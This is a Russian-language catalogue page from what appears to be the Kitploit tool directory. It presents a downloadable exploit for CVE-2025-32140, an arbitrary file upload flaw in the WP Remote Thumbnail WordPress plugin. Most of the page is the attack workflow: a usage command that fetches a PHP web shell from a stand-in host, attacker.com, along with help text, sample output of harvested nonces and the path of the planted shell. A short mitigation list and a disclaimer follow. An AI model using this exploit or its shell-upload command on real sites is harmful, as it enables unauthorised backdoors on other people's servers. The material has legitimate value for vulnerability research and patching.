Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32140 — Плагин WP Remote Thumbnail для WordPress версии <= 1.3.2 уязвим для произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-32140
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-32140

CVE-2025-32140

Плагин WP Remote Thumbnail для WordPress версии <= 1.3.2 уязвим для произвольной загрузки файлов

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2025-32140 – Эксплойт для WP Remote Thumbnail (произвольная загрузка файлов)


📝 Описание

CVE-2025-32140 — это критическая уязвимость в плагине WP Remote Thumbnail для WordPress. Она позволяет аутентифицированным атакующим (с правами автора или выше) загружать произвольные файлы, такие как веб-шеллы, используя ошибочную функцию, принимающую непроверенные URL.

Плагин не проверяет тип файла или содержимое, получаемое по предоставленному URL remote_thumb. Это позволяет атакующим сохранять вредоносные PHP-файлы (например, бэкдоры) в директорию /wp-content/uploads.


⚠️ Уязвимый компонент

  • Плагин: WP Remote Thumbnail
  • Уязвимые версии: <= 1.3.2
  • Патч: ещё не выпущен
  • Вектор атаки: Сеть
  • Требуемые привилегии: Низкие (аутентифицированный пользователь с возможностью edit_post)
  • Оценка CVSS: 9.9 (Critical)

🛠 Скрипт эксплойта

Этот скрипт на Python автоматизирует эксплуатацию CVE-2025-32140, выполняя следующие шаги:

  1. Вход на целевой сайт WordPress.
  2. Автоматическое извлечение необходимых nonce.
  3. Формирование и отправка вредоносного запроса через параметр remote_thumb.
  4. Загрузка веб-шелла на целевой сайт.

🔧 Параметры командной строки


🚀 Использование

root@kitploit:~
python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php

📖 Использование и справка

root@kitploit:~

                                                                                                                
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL

Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
  --username, -un USERNAME
                        Username
  --password, -p PASSWORD
                        Password
  --user_ID, -uid USER_ID
                        User ID (usually 1 for admin)
  --post_ID, -pid POST_ID
                        Target post ID
  --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)


📋 Пример вывода

root@kitploit:~
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited


📂 Расположение шелла

После эксплуатации загруженный веб-шелл, скорее всего, будет находиться по адресу:

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php

Замените YYYY/MM на текущий год и месяц загрузки.


🛡 Рекомендации

Чтобы снизить риск эксплуатации этой уязвимости:

  1. Обновите плагин до последней версии (как только появится патч).
  2. Ограничьте возможность загрузки файлов только доверенными пользователями.
  3. Отключите функцию удалённого извлечения миниатюр, если она не требуется.

⚠️ Отказ от ответственности

Этот скрипт предоставлен только в образовательных целях.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим эксплойтом.


👤 Автор

Автор: Nxploited ( Khaled Alenazi ) 🌟

Скачать инструмент
ПараметрАлиасОписание
--url-uURL целевого сайта WordPress (например, http://target.com/wordpress)
--username-unИмя пользователя WordPress с правами на редактирование записей
--password-pПароль для указанного пользователя
--user_ID-uidID пользователя WordPress (обычно 1 для администратора)
--post_ID-pidID редактируемой записи (может быть черновиком)
--shellПрямой URL к PHP-шеллу, размещённому на сервере атакующего